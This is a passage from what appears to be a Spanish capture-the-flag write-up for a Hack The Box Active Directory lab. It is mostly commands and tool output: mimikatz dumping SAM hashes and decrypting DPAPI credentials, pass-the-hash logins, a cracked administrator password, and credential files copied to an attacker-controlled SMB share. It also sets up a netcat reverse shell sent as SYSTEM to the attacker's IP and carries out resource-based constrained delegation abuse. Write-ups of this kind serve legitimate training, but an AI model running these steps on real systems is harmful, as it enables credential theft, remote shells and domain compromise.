      Sth1W5eVjLuQBoY+GmLVkvbi89H4d8QXmjpQ/Cd3c5aLHevdZANGzLechotR8qnblugrlSXfbMCHjfh/
      6QnFtaaqt4qplSzf6/lMDNdXYYcq2vk+4gFSG1bEg3D81xAlqlHn1yzL1F8eQBzOaks+N+OvXEjD3Hh9
      RjAXk7vc1YDK48oM5y9VfWkLfpNPy0yxKSMa3Tf5GJisX00s7PH5jiWnf++fF6LQBYZ4Alp/7xy4NTmT
      eXPpUmL/5toocIjK3WMD+odn4zOwBYG3I8zgx5A7r4RtYWlc6XTFH6K/biFiKKbc27WD1L5kyRbdFOaW
      14NgWMlODdPg/D8z8Zp99Mgbw78pz+lwJde9evdI8LE1s6kaPO45PR+E4PBBzHRPDGzu8FvOWlu0CWoR
      w3aN4InegqOB5DCB4aADAgEAooHZBIHWfYHTMIHQoIHNMIHKMIHHoCswKaADAgESoSIEINwGLNlsEGJR
      WkijUFG4GWTED++soOLAnJZPjv4HG7n9oQsbCUhUQi5MT0NBTKIaMBigAwIBCqERMA8bDWFkbWluaXN0
      cmF0b3KjBwMFAAChAAClERgPMjAyMzA0MzAwMzI4MDJaphEYDzIwMjMwNDMwMTMyODAxWqcRGA8yMDIz
      MDUwNzAzMjgwMVqoCxsJSFRCLkxPQ0FMqSAwHqADAgEBoRcwFRsEaHR0cBsNZGV2Lmh0Yi5sb2NhbA==

[+] Ticket successfully imported!

PS C:\Users\pc1\Desktop>

Una vez importado, con Enter-PSSession nos conectamos a dev.htb.local que se autenticara con el ticket y conseguimos una powershell como Administrator

PS C:\Users\pc1\Desktop> Enter-PSSession -ComputerName dev.htb.local  
[dev.htb.local]: PS C:\Users\Administrator\Documents> whoami
htb\administrator
[dev.htb.local]: PS C:\Users\Administrator\Documents>

Desde nuestro linux crearemos uns servicio smb con smbserver de impacket donde compartiremos el compilado de mimikatz.exe dando soporte al SMBv2

❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

En la sesión de Administrator en dev.htb.local nos copiamos el mimikatz.exe y lo usamos para dumpear la sam del equipo para poder ver los hashes NTLM

[dev.htb.local]: PS C:\Users\Administrator\Documents> cp \\10.10.14.10\kali\mimikatz.exe .
[dev.htb.local]: PS C:\Users\Administrator\Documents> .\mimikatz.exe 'token::elevate' 'lsadump::sam' exit

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

544     {0;000003e7} 1 D 35298          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;001327d5} 0 D 1314717     HTB\Administrator       S-1-5-21-4266912945-3985045794-2943778634-500  (14g,24p)        Primary  
 * Thread Token  : {0;000003e7} 1 D 1329433     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(commandline) # lsadump::sam
Domain : DEV
SysKey : e4b2298c95677ce18cd2198b9a36c7df
Local SID : S-1-5-21-4124311166-4116374192-336467615

SAMKey : bb3dbea7ca8bea043c6523bf5d915ae9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 67bb396c79f56301b7dc5d219cc85d86

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 03fc719a49e2ead4264a2690b650d7f0

* Primary:Kerberos-Newer-Keys *
    Default Salt : DEV.HTB.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : a0e06c2d823c4ffc2249abfd6af36dc90733a7c395ee81094261caf3d6c2dbd1
      aes128_hmac       (4096) : 6cf34b183d3555966797dcd55e6128ba
      des_cbc_md5       (4096) : 202667ab89080ebf
    OldCredentials
      aes256_hmac       (4096) : 977755e7a9132c495b90fe59cf5471cd1187b9dab491dac0cb6d02bcc5e30740
      aes128_hmac       (4096) : e56a6fc47b432e347ad3d918056626fd
      des_cbc_md5       (4096) : 074aae9e5df751f1
    OlderCredentials
      aes256_hmac       (4096) : 9d211ec8e9afdb2bd168120abc6a97375b3aa14826b6b512236c16cc361cd290
      aes128_hmac       (4096) : 99caad607311ade6c51edf9bf0afdd08
      des_cbc_md5       (4096) : 547afdf27c165e3b

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : DEV.HTB.LOCALAdministrator
    Credentials
      des_cbc_md5       : 202667ab89080ebf
    OldCredentials
      des_cbc_md5       : 074aae9e5df751f1


RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

mimikatz(commandline) # exit
Bye!
[dev.htb.local]: PS C:\Users\Administrator\Documents>

Ahora con el hash NT de Administrator podemos comprobarlo con crackmapexec en una autenticación a nivel local, este es valido tanto para smb como para winrm

❯ crackmapexec smb dev.htb.local -u Administrator -H 67bb396c79f56301b7dc5d219cc85d86 --local-auth
SMB         dev.htb.local   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:DEV) (signing:False) (SMBv1:True)  
SMB         dev.htb.local   445    DEV              [+] DEV\Administrator:67bb396c79f56301b7dc5d219cc85d86 (Pwn3d!)

❯ crackmapexec winrm dev.htb.local -u Administrator -H 67bb396c79f56301b7dc5d219cc85d86 --local-auth
SMB         dev.htb.local   5985   DEV              [*] Windows 10.0 Build 17763 (name:DEV) (domain:DEV)
HTTP        dev.htb.local   5985   DEV              [*] http://dev.htb.local:5985/wsman
WINRM       dev.htb.local   5985   DEV              [+] DEV\Administrator:67bb396c79f56301b7dc5d219cc85d86 (Pwn3d!)

Podemos simplemente conectarnos con evil-winrm usando el hash y leer la flag

❯ evil-winrm -i dev.htb.local -u Administrator -H 67bb396c79f56301b7dc5d219cc85d86  
PS C:\Users\Administrator\Documents> whoami
dev\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
HADES{Sp0ol_SeRv1ce_sO_Brok3n}
PS C:\Users\Administrator\Documents>

Resurrection

HADES{V5C_r3ve4L_DPaP1_s3cret5}

Listando las copias shadow con vssadmin, encontramos una para dev.htb.local

PS C:\Users\Administrator\Documents> vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {001689e5-f1a7-40a8-8b5b-8b6371bd07ca}
   Contained 1 shadow copies at creation time: 9/9/2019 3:10:57 AM
      Shadow Copy ID: {046396e4-6312-45b7-96cd-5e5f6fb017ef}
         Original Volume: (C:)\\?\Volume{21385651-0000-0000-0000-602200000000}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: dev.htb.local
         Service Machine: dev.htb.local
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential  

PS C:\Users\Administrator\Documents>

Para hacerlo mas accesible crearemos un link de la ruta con la copia para poder acceder a ella desde el directorio C:\VSS que es un nombre un poco mas corto

PS C:\Users\Administrator\Documents> cmd /c mklink /d C:\VSS \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\  
symbolic link created for C:\VSS <<===>> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
PS C:\Users\Administrator\Documents>

Usaremos de nuevo mimikatz que subimos de antes para dumpear la sam pero esta vez de la copia, para eso le pasaremos la ruta absoluta del system y de la sam

PS C:\Users\Administrator\Documents> .\mimikatz.exe 'lsadump::sam /system:C:\VSS\Windows\System32\config\SYSTEM /sam:C:\VSS\Windows\System32\config\SAM' exit  

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::sam /system:C:\VSS\Windows\System32\config\SYSTEM /sam:C:\VSS\Windows\System32\config\SAM
Domain : DEV
SysKey : e4b2298c95677ce18cd2198b9a36c7df
Local SID : S-1-5-21-4124311166-4116374192-336467615

SAMKey : bb3dbea7ca8bea043c6523bf5d915ae9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: de53e322ea95ac2723a2e3e149874aac

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : d9557883adf1e351ab19e287ce268464

* Primary:Kerberos-Newer-Keys *
    Default Salt : DEV.HTB.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 977755e7a9132c495b90fe59cf5471cd1187b9dab491dac0cb6d02bcc5e30740
      aes128_hmac       (4096) : e56a6fc47b432e347ad3d918056626fd
      des_cbc_md5       (4096) : 074aae9e5df751f1
    OldCredentials
      aes256_hmac       (4096) : 9d211ec8e9afdb2bd168120abc6a97375b3aa14826b6b512236c16cc361cd290
      aes128_hmac       (4096) : 99caad607311ade6c51edf9bf0afdd08
      des_cbc_md5       (4096) : 547afdf27c165e3b

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : DEV.HTB.LOCALAdministrator
    Credentials
      des_cbc_md5       : 074aae9e5df751f1
    OldCredentials
      des_cbc_md5       : 547afdf27c165e3b


RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

mimikatz(commandline) # exit
Bye!

PS C:\Users\Administrator\Documents>

Podemos ver el hash NT de Administrator que es diferente al que teniamos, con john al aplicar fuerza bruta logramos obtener la contraseña en texto plano

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash --format=NT  
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 XOP 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
./*40ra26AZ      (?)
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.

Listando las credenciales en el directorio de Administrator logramos encontrar 2

PS C:\Users\Administrator\Documents> dir C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Credentials -force  

    Directory: C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Credentials

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-hs-         9/9/2019   3:08 AM            474 1A2572C793495F694F64823A392D4718
-a-hs-         9/9/2019   3:07 AM            474 4A2EEB30EFC7958491B6578D9948EC7F

PS C:\Users\Administrator\Documents>

Para decifrar las credenciales dpapi necesitaremos descargar las masterkeys que se encuentran en Protect dentro de la carpeta que tiene el nombre del SID

PS C:\Users\Administrator\Documents> dir C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect  

    Directory: C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-         9/8/2019  12:44 PM                S-1-5-21-4124311166-4116374192-336467615-500

PS C:\Users\Administrator\Documents> dir C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-4124311166-4116374192-336467615-500 -force  

    Directory: C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-4124311166-4116374192-336467615-500

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-hs-         9/9/2019   3:07 AM            468 87790867-a883-4a2d-a467-019c315e1104
-a-hs-         9/8/2019  12:44 PM            468 dc6059f1-5ba2-4186-871a-0ff4055a6875
-a-hs-         9/9/2019   3:07 AM             24 Preferred

PS C:\Users\Administrator\Documents>

Iniciamos de nuevo un servicio smb para recibir todos esos archivos de la maquina

❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Ahora copiamos las credenciales dpapi y las masterkeys a el recurso smb creado

PS C:\Users\Administrator\Documents> cp C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Credentials\1A2572C793495F694F64823A392D4718 \\10.10.14.10\kali\1A2572C793495F694F64823A392D4718
PS C:\Users\Administrator\Documents> cp C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Credentials\4A2EEB30EFC7958491B6578D9948EC7F \\10.10.14.10\kali\4A2EEB30EFC7958491B6578D9948EC7F
PS C:\Users\Administrator\Documents> cp C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-4124311166-4116374192-336467615-500\87790867-a883-4a2d-a467-019c315e1104 \\10.10.14.10\kali\87790867-a883-4a2d-a467-019c315e1104  
PS C:\Users\Administrator\Documents> cp C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-4124311166-4116374192-336467615-500\dc6059f1-5ba2-4186-871a-0ff4055a6875 \\10.10.14.10\kali\dc6059f1-5ba2-4186-871a-0ff4
PS C:\Users\Administrator\Documents>

Una vez descargados los archivos para poder decifrarlas primero copiaremos las credenciales y las masterkeys a un Windows para poder correr el mimikatz

Iniciaremos ingresando la masterkey indicando el SID que hemos visto de antes y tambien la contraseña de Administrator que hemos conseguido y decifrado con john

mimikatz # dpapi::masterkey /in:87790867-a883-4a2d-a467-019c315e1104 /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:./*40ra26AZ
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {87790867-a883-4a2d-a467-019c315e1104}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : c41ab656df74c2a51cb872fa5a5be7fc
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : bac9efb95aeb3796cabdb684ec758f5d32b0a9c564eb6f32b9a8de9c75d8ac677b6ce2b6da49875e2c04629a23260e7ac849955cc17aed002e3d1a0154ce86cb8faec38312fa7d65472dcdba7e4e79688558f3a185c4f5fbb8e09a24f3b9d48dbbe802eef159ca62a394354b15beb940eadeb014f82a09cb2e92eed7276facbb50c01177f5db0b76ed3f31fb877e3ec5  


[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 50cbeb0513a21c53150e9b0cad9bd772
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 8b123f98402a3bc524367f6b00f918ccf767054a961fb96de8be049705d016c86db0323c769623a64140e782c8e85dd101530208d3d169a85b35fd65276689042bbf4ed4e3984171799d97a99ff2bf53f4603593a058f39da49d537041204e58f0dc808efc132085c9f703ae3c6a7aab

[credhist]
  **CREDHIST INFO**
    dwVersion        : 00000003 - 3
    guid             : {26b08a5f-4b2c-420d-9843-d05ea57cd32f}



[masterkey] with password: ./*40ra26AZ (normal user)
  key : e0b92cbfbeab126231d979377ffd236b2ebd4b0704e2e9229d3ce82bebd144173b9f7160315d5af62289fae50a1fd465100aaf36748b68557e2b05edc25ac4fe
  sha1: dacd0e1ccaa03abd1ccb22ce058815624739a607

mimikatz #

Al hacer esto mimikatz guardara la masterkey y la credencial dpapi en cache

mimikatz # dpapi::cache

CREDENTIALS cache
=================
SID:S-1-5-21-4124311166-4116374192-336467615-500;GUID:{26b08a5f-4b2c-420d-9843-d05ea57cd32f};MD4:de53e322ea95ac2723a2e3e149874aac;SHA1:7cb14ea6f0ed4e5ed9ac0a6a167f088eeec2e09b;  

MASTERKEYS cache
================
GUID:{87790867-a883-4a2d-a467-019c315e1104};KeyHash:dacd0e1ccaa03abd1ccb22ce058815624739a607

DOMAINKEYS cache
================

mimikatz #

Después simplemente podemos pasarle la primera de ambas credenciales dpapi para decifrarlas, esta tiene como target la flag y como contenido su valor

mimikatz # dpapi::cred /in:1A2572C793495F694F64823A392D4718
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {87790867-a883-4a2d-a467-019c315e1104}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : 70fb047908ba7943f6933f49a289e407b87d8432e85bbe45ad9b91cee513bc9c
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : 9e73cba5176f1ba8bbd5a999eb9092e9371dfba4195d55d5e30b030e671206cb
  dwDataLen          : 000000c0 - 192
  pbData             : b55d72a3e4f00c4b103e5a23e6cb4bc97594204460d87cb7555dc700cd8c304050f0bac19475c4e9b0935d8808d7e6ef67d37d11ac43c6018bc59a8de680548c5e6f5f5344b4a9f9f0ea6fc3d6d847a72fbb97a54845c627e37b7aa368b4d6d24831af7cc2bcec6ac7d376651adb734bf93091eb034722cdd99974da553fa741eb5124394189e6018ad07543f796102adc5e3f81b28082350cab75ca407025a449eafc18c5795fe15e497df6a330ed64ca37f94df1b32dfb592f0562d1fabcce
  dwSignLen          : 00000040 - 64
  pbSign             : a0a7a1f7462b93455e6673f33d45742931269a9eb9666515a04852bdfcb78ad570352e10c78805356f8baf0751f33dcfb70b29a9c49eb10ec14121e815381196

Decrypting Credential:
 * volatile cache: GUID:{87790867-a883-4a2d-a467-019c315e1104};KeyHash:dacd0e1ccaa03abd1ccb22ce058815624739a607
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000b6 - 182
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 09/09/2019 10:08:32 a. m.
  unkFlagsOrSize : 00000040 - 64
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:target=flag
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : flag
  CredentialBlob : HADES{V5C_r3ve4L_DPaP1_s3cret5}
  Attributes     : 0

mimikatz #

Gateway

HADES{From_RBCD_To_p4s5word_v@Ult}

La otra credencial dpapi nos muestra como username el usuario test-svc a nivel de dominio y como contenido de la credencial encontramos su contraseña

mimikatz # dpapi::cred /in:4A2EEB30EFC7958491B6578D9948EC7F
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {87790867-a883-4a2d-a467-019c315e1104}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : fdb8e305b9dee0d4731a4e95af29273c2da220f0f7a5d41d83bfd14dff9f8cc5
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : c79494440e85f96dba9a8244ddef0a399ba44453dcfda0ae2a0e69349c0b0a0f
  dwDataLen          : 000000c0 - 192
  pbData             : b207f818a6599b2f7b4cbd9635bfa1658489e4ff501cd14d89187bea2e1ebafb01ce45bbc23100e8d3316c8ba0f02370ac09985027298520434cc9f607c52ce92bae597b54451f7f79b24b9c3184794927cbbccf0babde469ae281481a7e96b19c3131de62a77cb0f95604b02668aa9c54f04714c79843874f9a98131b8f22bfde94cfd011b1f3a56c1bab6e09ee0aa4e452d5b1c751d91659c11a0544cb6923bd9d891b07c432d844810a55a2dc3aa87db3452d2ad679c76532db453937c226  
  dwSignLen          : 00000040 - 64
  pbSign             : e59eba5fedeb1dab7d34f4e8392471dfed422e845bee3d5b83994d8c8fd4ce1b84b58550ca7514f28d5115a64bf6c5c830cbb40a5e213a519f829893186edbc0

Decrypting Credential:
 * volatile cache: GUID:{87790867-a883-4a2d-a467-019c315e1104};KeyHash:dacd0e1ccaa03abd1ccb22ce058815624739a607
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000ba - 186
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 09/09/2019 10:07:12 a. m.
  unkFlagsOrSize : 00000028 - 40
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:target=web
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : htb.local\test-svc
  CredentialBlob : T3st-S3v!ce-F0r-Pr0d
  Attributes     : 0

mimikatz #

Comprobamos las credenciales a nivel de dominio con crackmapexec, son validas

❯ crackmapexec smb dc1.htb.local -u test-svc -p 'T3st-S3v!ce-F0r-Pr0d'
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [+] htb.local\test-svc:T3st-S3v!ce-F0r-Pr0d

Para enumerar privilegios e información del dominio iniciaremos por subir el modulo SharpHound.ps1 usando la función upload que viene incluida en evil-winrm

PS C:\Users\Administrator\Documents> upload SharpHound.ps1

Info: Uploading SharpHound.ps1 to C:\Users\Administrator\Documents\SharpHound.ps1  

Data: 1757460 bytes of 1757460 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents>

Ya que las credenciales tambien podemos usarlas para ldap, importamos el modulo de SharpHound y lo invocamos pasandole las credenciales de test-svc

❯ crackmapexec ldap dc1.htb.local -u test-svc -p 'T3st-S3v!ce-F0r-Pr0d'
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
LDAP        dc1.htb.local   389    DC1              [+] htb.local\test-svc:T3st-S3v!ce-F0r-Pr0d

PS C:\Users\Administrator\Documents> Import-Module .\SharpHound.ps1
PS C:\Users\Administrator\Documents> Invoke-Bloodhound -CollectionMethod All -Domain htb.local -LdapUser 'test-svc' -LdapPassword 'T3st-S3v!ce-F0r-Pr0d'  
PS C:\Users\Administrator\Documents>

Al ejecutarlo nos creara un zip con toda la inforamción del dominio, podemos simplemente descargarlo con la función download de evil-winrm como BH.zip

PS C:\Users\Administrator\Documents> dir

    Directory: C:\Users\Administrator\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/27/2023   9:06 PM          12157 20230427210646_BloodHound.zip
-a----        4/27/2023   8:46 PM        1250056 mimikatz.exe
-a----        4/27/2023   9:03 PM        1318097 SharpHound.ps1

PS C:\Users\Administrator\Documents> download .\20230427210646_BloodHound.zip BH.zip  

Info: Downloading .\20230427210646_BloodHound.zip to BH.zip

Info: Download successful!

PS C:\Users\Administrator\Documents>

Lo subimos a bloodhound y mirando los controles de objetos del usuario test-svc encontramos que tiene el privilegio GenericAll sobre el equipo web.htb.local

Para explotarlo necesitaremos algunas cosas iniciando por los modulos PowerView y Powermad, además de Rubeus para solicitar e importar un ticket al final

PS C:\Users\Administrator\Documents> upload PowerView.ps1

Info: Uploading PowerView.ps1 to C:\Users\Administrator\Documents\PowerView.ps1

Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> upload Powermad.ps1

Info: Uploading Powermad.ps1 to C:\Users\Administrator\Documents\Powermad.ps1  

Data: 180768 bytes of 180768 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> upload Rubeus.exe

Info: Uploading Rubeus.exe to C:\Users\Administrator\Documents\Rubeus.exe

Data: 595968 bytes of 595968 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents>

Sin embargo la operacion que necesitamos hacer es necesario ejecutarla como el usuario nt authority\system asi que subimos un par de modulos y el netcat.exe

PS C:\Users\Administrator\Documents> upload Invoke-CommandAs.ps1

Info: Uploading Invoke-CommandAs.ps1 to C:\Users\Administrator\Documents\Invoke-CommandAs.ps1

Data: 25480 bytes of 25480 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> upload Invoke-ScheduledTask.ps1

Info: Uploading Invoke-ScheduledTask.ps1 to C:\Users\Administrator\Documents\Invoke-ScheduledTask.ps1  

Data: 13788 bytes of 13788 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> upload netcat.exe

Info: Uploading netcat.exe to C:\Users\Administrator\Documents\netcat.exe

Data: 60360 bytes of 60360 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents>

Importamos ambos modulos y usando el netcat nos enviamos una powershell a nuestro host pero como el usuario nt authority\system con el parametro AsSystem

PS C:\Users\Administrator\Documents> Import-Module .\Invoke-CommandAs.ps1
PS C:\Users\Administrator\Documents> Import-Module .\Invoke-ScheduledTask.ps1
PS C:\Users\Administrator\Documents> Invoke-CommandAs -ScriptBlock { C:\Users\Administrator\Documents\netcat.exe -e powershell.exe 10.10.14.10 443 } -AsSystem  
PS C:\Users\Administrator\Documents>

❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.13.38.17
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>

Deste esta shell ahora si importamos ambos modulos que subimos de antes

PS C:\Users\Administrator\Documents> Import-Module .\Powermad.ps1
PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1  
PS C:\Users\Administrator\Documents>

Ahora definimos las credenciales del usuario test-svc que tiene el privilegio

PS C:\Users\Administrator\Documents> $SecPassword = ConvertTo-SecureString 'T3st-S3v!ce-F0r-Pr0d' -AsPlainText -Force
PS C:\Users\Administrator\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\test-svc', $SecPassword)  
PS C:\Users\Administrator\Documents>

Ahora añadimos una nueva cuenta de equipo en este caos identificada con el nombre attackersystem y una contraseña sencilla de recordar como lo es 123456

PS C:\Users\Administrator\Documents> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Credential $Cred  
[+] Machine account attackersystem added
PS C:\Users\Administrator\Documents>

Seguimos los pasos que nos indica bloodhound en el apartado Help de GenericAll para obtener la variable $SDBytes del equipo attackersystem que hemos creado

PS C:\Users\Administrator\Documents> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid -Credential $Cred | Select -Expand objectsid
PS C:\Users\Administrator\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"  
PS C:\Users\Administrator\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\Users\Administrator\Documents> $SD.GetBinaryForm($SDBytes, 0)
PS C:\Users\Administrator\Documents>

Finalmente seteamos el objeto hacia el equipo WEB donde tenemos los privilegios

PS C:\Users\Administrator\Documents> Get-DomainComputer WEB -Credential $Cred | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Credential $Cred  
PS C:\Users\Administrator\Documents>

Este proceso tambien podriamos hacerlo desde linux creando el equipo con addcomputer de impacket y configurando el permiso hacia WEB con rbcd

❯ impacket-addcomputer -computer-name attackersystem$ -computer-pass 123456 htb.local/test-svc:'T3st-S3v!ce-F0r-Pr0d'  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Successfully added machine account attackersystem$ with password 123456.

❯ impacket-rbcd -delegate-from attackersystem$ -delegate-to WEB$ -action write htb.local/test-svc:'T3st-S3v!ce-F0r-Pr0d'  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attackersystem$ can now impersonate users on WEB$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem$   (S-1-5-21-4266912945-3985045794-2943778634-15101)

Con Rubeus.exe podemos convertir la contraseña 123456 que seteamos a un hash

PS C:\Users\Administrator\Documents> .\Rubeus.exe hash /password:123456 /user:attackersystem$ /domain:htb.local  

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
